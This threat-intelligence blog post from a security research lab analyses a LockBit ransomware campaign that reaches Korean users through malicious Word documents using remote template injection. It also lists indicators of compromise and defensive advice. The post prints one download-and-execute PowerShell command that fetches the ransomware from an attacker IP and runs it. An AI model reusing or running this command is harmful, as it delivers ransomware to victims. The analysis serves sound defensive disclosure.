Threat Actor Targeting Korean Users through malicious Document Files
Cyble Research and Intelligence Labs (CRIL) recently discovered an ongoing campaign associated with the notorious ransomware group LockBit.
LockBit has been actively operating since September 2019 and consistently employs various methods to spread its malware. These tactics include distributing phishing emails containing malicious files, utilizing drive-by downloads, and exploiting vulnerabilities in the remote desktop protocol (RDP). As a result, LockBit has established itself as a prominent and active threat actor in the realm of ransomware.
The LockBit ransomware group utilizes a double extortion technique to enhance their likelihood of obtaining ransom payments from victims. This technique encompasses multiple stages, including data encryption to render victim data inaccessible and threats to release stolen data on designated leak sites. By employing this approach, the group aims to exert significant pressure on victims, compelling them to comply with their demands and pay the ransom.
LockBit ransomware’s maldocs campaign, initially detected in 2022, had specifically targeted individuals in Korea. In their latest campaign, LockBit has once again embraced the approach of disseminating malware through malicious document files targeting Korean individuals. Notably, the group utilized the same template injection techniques to deliver their payload.
The figure below depicts the delivery method employed by the LockBit ransomware group.
Technical Analysis
For analysis purposes, we have taken a specific sample (sha256: 7391bbd59330e79f8ee4a01e5ed20df5ab183737f2b91f926b649facd8d2d278) which is a .docx file commonly known as Office Open XML (OOXML). OOXML files are essentially packaged ZIP archives that consist of multiple XML files called parts. These parts contain various properties that collectively determine the document’s display and processing. Within these parts, certain properties may reference shared public resources accessible through online URLs.
It is also observed that the original filenames of the identified .docx samples were written in the Korean language.
The below image shows the malicious document.
Upon opening the malicious document, it attempts to establish a connection with the remote server to retrieve the subsequent component of the attack. This process involves multiple stages of execution.
In the initial stage, a URL hosting the malicious template file (.dotm) is injected into settings.xml.rels file that resides within the document package. This enables the document to fetch the .dotm file from the remote server required for further actions. This technique employed by the attackers aligns with CVE-2017-0199.
The below image shows the extracted content of the document file.
The below figure displays the contents of the settings.xml.rels file, highlighting the inclusion of a malicious URL and the presence of the Target mode within the settings.xml.rels file.
Once a successful connection to the remote server is established, a malicious template file is downloaded and executed. The downloaded template file contains an obfuscated VBA macro. TAs have opted for this technique due to its ability to bypass detection mechanisms. Unlike traditional methods that rely on suspicious indicators such as macros, this technique does not require their presence in the document until the malicious template is retrieved.
The image below displays the de-Obfuscated VBA content from the downloaded template file.
The VBA script incorporates a PowerShell command mentioned below to trigger the retrieval of the final stage payload, which is an executable file named “tinytask.exe” from the remote server.
Following the successful download, the script saves the obtained payload in the directory “C:\Users\Public\456trytgre3e45yrthtgr.exe” on the compromised system and proceeds to execute it.
- “cmd /c powershell/W 01 curl hxxp://91[.]107[.]210[.]207/tinytask.exe -o C:\Users\Public\456trytgre3e45yrthtgr.exe; C:\Users\Public\456trytgre3e45yrthtgr.exe”
The downloaded payload is Lockbit ransomware 2.0.
LockBit Ransomware:
After the LockBit ransomware successfully executes on a system, it initiates a series of actions. These actions include encrypting files with .lockbit extension, modifying Windows automatic backups by deleting shadow copies using vssadmin.exe, disabling startup repairs using the bcdedit tool, and more.
The below figure shows the encrypted files with the .lockbit extension.
Additionally, the ransomware leaves a ransom note that provides detailed instructions for making the required payment, as shown in the below figure.
We recommend referring to our previous blog post to comprehensively examine LockBit 2.0 and Lockbit 3.0 ransomware.
Conclusion
The Lockbit ransomware has taken a surprising turn by adopting the old strategy of distributing its payload through malicious documents. This shift in behavior has caught us off guard, making it difficult to predict the motives behind this change. However, it is evident that Lockbit remains a significant threat, continuously evolving and expanding its capabilities. Therefore, users must remain vigilant and adopt robust security measures to protect against potential Lockbit ransomware attacks.
Cyble Research & Intelligence Labs continuously monitor ransomware campaigns and will keep updating our readers with the latest information.
Our Recommendations
We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:
Safety Measures Needed to Prevent Ransomware Attacks
- Conduct regular backup practices and keep those backups offline or in a separate network.
- Turn on the automatic software update feature on your computer, mobile, and other connected devices wherever possible and pragmatic.
- Use a reputed anti-virus and Internet security software package on your connected devices, including PC, laptop, and mobile.
- Refrain from opening untrusted links and email attachments without verifying their authenticity.
Users Should Take the Following Steps After the Ransomware Attack
- Detach infected devices on the same network.
- Disconnect external storage devices if connected.
- Inspect system logs for suspicious events.
Impact of Ransomware
- Loss of Valuable data.
- Loss of the organization’s reputation and integrity.
- Loss of the organization’s sensitive business information.
- Disruption in organization operation.
- Financial loss.
MITRE ATT&CK® Techniques
| Tactic | Technique ID | Technique Name |
| Execution | T1059 T1204 | Command and Scripting Interpreter User Execution |
| Discovery | T1082 T1083 | System Information Discovery File and Directory Discovery |
| Defense Evasion | T1070 | Delete shadow drive data |
| Impact | T1486 T1490 | Data encrypted for impact Inhibit System Recovery |
| Command and control | T1071 | Application Layer Protocol |
Indicators of Compromise (IOCs)
| Indicators | Indicator Type | Description |
| 7391bbd59330e79f8ee4a01e5ed20df5ab183737f2b91f926b649facd8d2d278 462e39e554bd3abb9ecdcec92d861b315f1efb77 2831b37cf521848142e8a5d69515b065 | Sha256 Sha1 Md5 | Malicious docx file |
| d833c23bad7b1988832524bce8a6355c97d031bb3852f671e52fdf9024bd6ec0 32a155dbb9652dd88ae41044e342c1ef92f7e6f2 5e7b650a6e0070bceed648681bff20fe | Sha256 Sha1 Md5 | Malicious docx file |
| 78db865edcf1bcd27b765c458ef1675233b11947dfceef7c45fdd254ae514a3f 2a6df9fa510af4d3e7fde1002ad54c5576abbc07 9a1cac28f716d2e660f2bd6297cd560b | Sha256 Sha1 Md5 | Malicious .dotm file |
| 8022060ef633e157518037122a6003813cc0a3066d456a1164275a211efc8f5c 32a155dbb9652dd88ae41044e342c1ef92f7e6f2 5e7b650a6e0070bceed648681bff20fe | Sha256 Sha1 Md5 | Lockbit ransomware |
| hxxp://91[.]107[.]210[.]207/tinytask[.]exe hxxp://91[.]107[.]210[.]207/b66ssc[.]dotm | URLS |
Comments are closed.